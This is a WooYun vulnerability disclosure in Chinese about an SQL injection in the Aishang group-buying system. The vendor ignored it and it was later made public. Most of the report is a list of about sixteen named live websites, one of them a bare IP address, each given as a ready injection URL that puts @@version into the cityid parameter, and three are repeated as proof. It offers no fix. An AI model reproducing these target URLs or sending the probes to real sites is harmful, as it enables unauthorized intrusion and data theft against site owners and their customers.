漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-087710
漏洞标题:某团购系统存在一处SQL注入
相关厂商:北京艾尚智美科技有限公司
漏洞作者: 路人甲
提交时间:2014-12-22 17:11
修复时间:2015-03-22 17:12
公开时间:2015-03-22 17:12
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-12-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-22: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT
详细说明:
艾尚团购程序存在一处SQL注入,谷歌几十页不重样
官网:http://www.asdht.com/
案例:
http://tuan.eduts.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://tuan.2760391.cn/help/pendantShow.aspx?stype=3&&cityid=@@version
http://www.ndtuan.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://m.5izi.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://benear.net/help/pendantShow.aspx?stype=3&&cityid=@@version
http://tg.mm315.cn/help/pendantShow.aspx?stype=3&&cityid=@@version
http://www.pxtb.org/help/pendantShow.aspx?stype=3&&cityid=@@version
http://jiaodatuan.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://tuan.mojing8.com/bangzhu/pendantShow.aspx?stype=3&&cityid=@@version
http://www.tongluowan.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://tuan.hk360buy.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://58.53.209.134/help/pendantShow.aspx?stype=3&&cityid=@@version 电信的站
http://tuan.jetsoguide.com/bangzhu/pendantShow.aspx?stype=3&&cityid=@@version
http://www.mtuan365.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://tuangou.yongyao.net/help/pendantShow.aspx?stype=3&&cityid=@@version
http://www.vlvyou.com/help/pendantShow.aspx?stype=3&&cityid=@@version
漏洞证明:
我就随便演示几个站了
http://58.53.209.134/help/pendantShow.aspx?stype=3&&cityid=@@version
http://www.vlvyou.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://m.5izi.com/help/pendantShow.aspx?stype=3&&cityid=@@version
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝